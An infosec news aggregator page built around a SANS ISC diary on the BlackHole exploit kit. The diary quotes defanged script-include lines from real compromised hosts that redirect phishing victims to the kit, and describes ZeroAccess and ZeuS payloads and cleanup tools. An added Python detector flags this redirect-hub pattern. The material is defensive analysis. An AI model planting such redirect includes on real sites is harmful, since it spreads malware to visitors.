InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Google continues to shut down underperforming services, announcing Tuesday that Friend Connect, Knol and a few other services will soon go the way of Google Health and Google Buzz.
Puppet 'certdnsnames' Certificate Validation Security Bypass Vulnerability
Computer scientists at the National Institute of Standards and Technology (NIST) have dramatically enlarged a database designed to improve applications that help programmers find weaknesses in software. This database, the SAMATE ...
A new tool, developed by the National Institute of Standards and Technology (NIST) and offered for free, can help public and private organizations, large and small, to understand and implement the requirements of the Health Insurance ...
Charles (Chuck) H. Romine became director of the NIST Information Technology Laboratory.
Hewlett-Packard has updated the road map for its high-end Integrity servers to include systems that can accommodate both Xeon- and Itanium-based servers side by side, the company announced Tuesday.
Gibbs has a bit of an obsession with maps and he loves him his iOS apps.
Dell on Tuesday said it has upgraded its PowerEdge servers with the just-released 16-core Opteron processors from Advanced Micro Devices.
The U.S. Federal Communications Commission's staff has found AT&T's proposed US$39 billion acquisition of rival T-Mobile USA to be contrary to the public interest, with officials there saying the deal would result in the largest single concentration in the U.S. mobile market in history.
The Protect IP Act, which would allow the U.S. Department of Justice to seek court orders focused on shutting down websites accused of copyright infringement, could come up for a vote in the U.S. Senate by early December, and one senator is threatening to filibuster the bill.
Oracle Java SE CVE-2011-3555 Remote Java Runtime Environment Vulnerability
Oracle Java SE CVE-2011-3549 Remote Java Runtime Environment Vulnerability
Hewlett-Packard, which recently discontinued its TouchPad tablets, took the top spot among tablet vendors behind Apple's iPad this year through October, according to research from NPD.
Former SAP partner Wellogix is accusing the vendor of stealing its trade secrets and swindling it out of lucrative software projects, according to a lawsuit Wellogix filed last week in U.S. District Court for the Southern District of Texas.
The early brunt of a hard-drive shortage resulting from widespread flooding in Thailand is falling on small PC makers, who are raising computer prices to stem losses.
Finance, working with IT, increasingly must manage the serious risks, from planning to handling fallout.
NJStar Communicator MiniSMTP Server Remote Stack Buffer Overflow Vulnerability
Aviosoft DTV Player '.plf' File Remote Buffer Overflow Vulnerability
Zenprise Device Manager Cross Site Request Forgery Vulnerability
The recent cyberattack on a public water utility in Springfield, Ill. has stoked concerns about the vulnerability of critical infrastructure equipment across the U.S.
Microsoft Excel OBJ Record Stack Overflow Remote Code Execution Vulnerability
[security bulletin] HPSBMU02726 SSRT100685 rev.1 - HP Operations Agent and Performance Agent for AIX, HP-UX, Linux, and Solaris, Local Unauthorized Access

Mpack, IcePack, Eleonore, Phoenix, BlackHole... from time to time we see a new exploit kit become prevalent due to the advances it brings. These names are all very well known exploit kits that were, or still are, quite successful.

One of the most advanced exploit kits these days is the BlackHole Exploit Kit. It contains a lot of interesting features, like a very detailed control panel and many configuration options, as can be seen on the following fairly recent CP (Control Panel) screenshots.


So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.

The most common method used by BlackHole to spread is via links inside phishing emails.

For example:
1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website

But recently they improved this method by adding another layer:

1) Phishing email contains a link to a website
2) The website contains four external script includes like:

#h1#WAIT PLEASE#/h1#
#script language=JavaScript type=text/JavaScript src=hXXp://www.kvicklyhelsinge[.]dk/js.js##/script#
#script language=JavaScript type=text/JavaScript src=hXXp://michellesflowersltd[.]co.uk/js.js##/script#
#script language=JavaScript type=text/JavaScript src=hXXp://myescortsdirectory[.]com/js.js##/script#
#script language=JavaScript type=text/JavaScript src=hXXp://nitconnect[.]net/js.js##/script#

3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:


That makes it really easy for the author to switch to new websites and, at the same time, makes a takedown harder.
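As an added example (not code from the diary or from the ISC), the following Python script shows one way a defender can triage the intermediate page in the chain above: it parses the HTML, collects every external script include, groups them by script path, and flags the page when the same path (here js.js) is pulled from several unrelated hosts. The sample pages, the placeholder domains (site-one.example and friends, not the ones quoted in the diary), the function names and the three-host threshold are all assumptions of this example; it parses only the HTML it is handed and never fetches anything.

```python
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def refang(url):
    """Undo common defanging (hXXp://, [.]) so IOC-style text parses as a URL."""
    return url.replace("hXXp", "http").replace("hxxp", "http").replace("[.]", ".")


def scripts_by_path(html, page_host=None):
    """Map each external script path (e.g. '/js.js') to the sorted hosts it is loaded from.

    Scripts served from page_host itself, or with a relative src, are ignored:
    a site loading its own JavaScript is not the redirect-hub pattern.
    """
    collector = ScriptSrcCollector()
    collector.feed(html)
    hosts_by_path = defaultdict(set)
    for src in collector.srcs:
        parsed = urlparse(refang(src))
        host = parsed.netloc.lower()
        if not host or host == (page_host or "").lower():
            continue  # relative or same-origin include: not an external hop
        hosts_by_path[parsed.path.lower() or "/"].add(host)
    return {path: sorted(hosts) for path, hosts in hosts_by_path.items()}


def flag_redirect_hub(html, page_host=None, min_hosts=3):
    """Return [(path, hosts)] for every script path pulled from >= min_hosts distinct hosts.

    The threshold is a hypothetical choice for this example; tune it to your data.
    """
    return [(path, hosts) for path, hosts in scripts_by_path(html, page_host).items()
            if len(hosts) >= min_hosts]


# Constructed sample input with placeholder domains (not the diary's): a near-empty
# page whose only content is the same script name loaded from four unrelated hosts,
# mimicking the layout quoted above (defanged on purpose, refang() handles it).
SUSPECT_PAGE = """
<html><body>
<h1>WAIT PLEASE</h1>
<script language=JavaScript type=text/JavaScript src=hXXp://site-one[.]example/js.js></script>
<script language=JavaScript type=text/JavaScript src=hXXp://site-two[.]example/js.js></script>
<script language=JavaScript type=text/JavaScript src=hXXp://site-three[.]example/js.js></script>
<script language=JavaScript type=text/JavaScript src=hXXp://site-four[.]example/js.js></script>
</body></html>
"""

# Constructed benign page: one third-party library plus the site's own script.
BENIGN_PAGE = """
<html><head>
<script src="https://cdn.example/lib/jquery.min.js"></script>
<script src="/static/app.js"></script>
</head><body><p>hello</p></body></html>
"""

if __name__ == "__main__":
    for label, page in (("suspect", SUSPECT_PAGE), ("benign", BENIGN_PAGE)):
        hits = flag_redirect_hub(page, page_host="www.example")
        print(label, "->", hits or "no redirect-hub pattern")
```

The hosts returned for a flagged page are exactly the intermediate sites worth adding to a blocklist or handing to the takedown request; because the kit's operators can rotate those hosts at will, the script keys on the structural pattern (one path, many hosts) rather than on any specific domain.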

After that you already know what happens: it fingerprints your system and selects the best exploit for it, such as a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and SpyEye, but just recently that started to change...

That brings us to the second update: ZeroAccess.
ZeroAccess is not something new; in fact it has been around for some years, but it is showing some very interesting development.

In fact, when I first found it again a few days ago, I thought that it was the TDL3 rootkit.

If you remember, TDL3 infects a different .sys driver on the system at each infection, and when you try to recover the .sys file it hands you the clean copy; that, among other things, is a characteristic the two have in common.
One recent BH exploit kit instance delivers a downloader trojan, which in turn downloads two more trojans: ZeroAccess and ZeuS.
On some infections it may also download a spambot, likely related to the Cutwail botnet, to keep spreading all kinds of spam.
The recent ZeroAccess trojan will also create the following folders on the system:


Since it wants to make money via AdClicking, you will probably see this kind of traffic associated with it:

On the good side, since it has several items in common with TDSS, we also have some good tools to find it.
The following tools were tested and worked quite well against ZeroAccess; Kaspersky's TDSSKiller has a nice feature that offers a quarantine option if you want it.

TDSSKiller.exe - Kaspersky
AntiZeroAccess - WebRoot
RootkitRemover - McAfee

Ah yes, remember that these tools clean only that one trojan, and that you still have at least a ZeuS running on the system... Isn't it a nice pack?

Btw, besides my regular Twitter account, I created one to keep posting security indicators as I see them. The Twitter account is @secindicators if you are interested.
Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure
Facebook is working with HTC to build an Android-based smartphone with Facebook social networking services at its core, according to an All Things D report.
On Friday, we reported that VMware Fusion 4.1 can run virtual versions of Leopard and Snow Leopard, a feature previously barred by Apple’s end-user license agreement. On Monday, the other shoe dropped: VMware posted a blog entry that seems to back away from that feature.
Even though it completed the bulk of a major restructuring earlier this year, Cisco continues to tweak its internal organizational structure, combining its network management group into a larger cloud and systems management technology group, according to an internal Cisco memo.
Several Republicans in the U.S. Congress who voted this year to overturn net neutrality rules -- with most opponents arguing the rules would create the first-ever regulation of the Internet -- have now signed on to sponsor one of two bills that would allow the U.S. Department of Justice to seek court orders to shut down websites accused of infringing copyright.
Re: jara 1.6 sql injection vulnerability
Re: XSS in Tiki Wiki CMS Groupware
The Samsung Illusion smartphone, made from recycled materials, will be offered for free by Verizon Wireless with a two-year contract from Thursday through Monday in an online promotion.
The consumerization of IT trend's leading wave is the use of personal mobile technology, so a smart BYOD strategy lays the groundwork for a complete consumerization approach. Insider (free registration required)
A new class of all-SSD arrays that use compression and deduplication are challenging tiered storage infrastructures with better performance at about the same cost, according to Forrester Research.
This year the number of operators that have implemented HD Voice has almost tripled, and more phones are also compatible with the technology, according to a report by industry organization GSA (Global mobile Suppliers Association).
From storage for virtual machines to cheap all-flash hardware, here are seven movers and shakers in the network storage market today.
Adobe will provide one more version of Flash Player for the new Android 4.0 operating system by year's end before following through on its plan to halt development of the software for mobile browsers.
The Electronic Frontier Foundation (EFF) is proposing an extension to the current SSL chain of trust that aims to improve the security of HTTPS and other secure communication protocols.
The United States’ Stop Online Piracy Act (SOPA), which would allow domain names seizures by U.S. authorities on copyright ‘infringing’ websites, has taken another blow as a leading proponent does a U-turn on supporting it.
The international competition to build an exascale supercomputer is gaining steam. Peter Beckman, a top computer scientist at the Department of Energy's Argonne National Laboratory, explains why the effort is important.
Qualcomm's long-awaited Mirasol reflective color screen technology is on the market, in an e-reader that launched in South Korea on Tuesday.
China is introducing programs to ensure the country's local governments, from provincial down to county and municipal levels, are all using legal software, a top Chinese official said during a meeting with visiting U.S. officials.
Ebay has acquired Hunch, an online platform for customized purchase recommendations, for an undisclosed price, it said Monday.
Microsoft claimed yesterday that users will be able to complete a Windows 8 upgrade much faster, in some cases in one-tenth the time it took similar-configured PCs to upgrade to Windows 7.
Face Unlock, the facial recognition software offered in Android 4.0 on the Galaxy Nexus, is being promoted by Google as an alternative to using a PIN to unlock a phone. But it can apparently be spoofed.
From power to polish, Google's Ice Cream Sandwich delivers a massive burst of energy to the Android platform. Here's a detailed review of what's new and how it measures up.
From power to polish, Google's Ice Cream Sandwich delivers a massive burst of energy to the Android platform. Here's a close-up look at many of its new features.
Samsung's Galaxy Nexus, which will run Google's new Android 4.0 (Ice Cream Sandwich) OS, looks like the next smartphone to beat.
Archlinux Shaman Configuration File Local Privilege Escalation Vulnerability
Support Incident Tracker 'translate.php' Remote Code Execution Vulnerability

Posted by InfoSec News on Nov 22


By Angus Batey
November 22, 2011

DAVID Vincenzetti isn't your typical arms dealer. He's never sold a
machinegun, a grenade or a surface-to-air missile. But, make no mistake,
he has access to a weapon so powerful it could bring a country to its
knees. It's called RCS - Remote Control System - and it's a piece of...

Posted by InfoSec News on Nov 22


China Daily

The United States continues to blame China for alleged intrusions into
US government and defense industry computer networks.

This month a report released by the Project 2049 Initiative, a US-based
think tank, details China's signals intelligence organization, and what
role it thinks the People's Liberation Army has in collecting cyber...

Posted by InfoSec News on Nov 22


By Ben Moshinsky
November 21, 2011

U.K. banks face a day of disaster tomorrow, as part of a simulation led
by the Financial Services Authority to test firms’ responses to a
cyber-attack on payment systems and travel chaos during the London 2012
Olympic Games.

The FSA will start the exercise at 8 a.m., contacting 87...

Posted by InfoSec News on Nov 22


By George V. Hulme
November 21, 2011

Experts in the security of critical infrastructure have had the weekend
to digest news that a public utility water pump in Springfield, Ill. was
destroyed at the hands of remote attackers who were able to gain access
to the SCADA systems controlling it. Their initial advice: Share any...
Contao CMS Cross-Site Scripting Vulnerability
Nanya said on Tuesday it has filed a patent infringement complaint in the U.S. against Japan's Elpida, further escalating the legal battle between the two DRAM makers.

Posted by InfoSec News on Nov 22


By Elinor Mills
InSecurity Complex
CNet News
November 21, 2011

AT&T said today that it successfully thwarted what appeared to be an
attempt by someone to steal mobile customer data.

"We recently detected what could have been an organized attempt to
obtain information on a number of customer accounts," AT&T spokesman
Mark Siegel...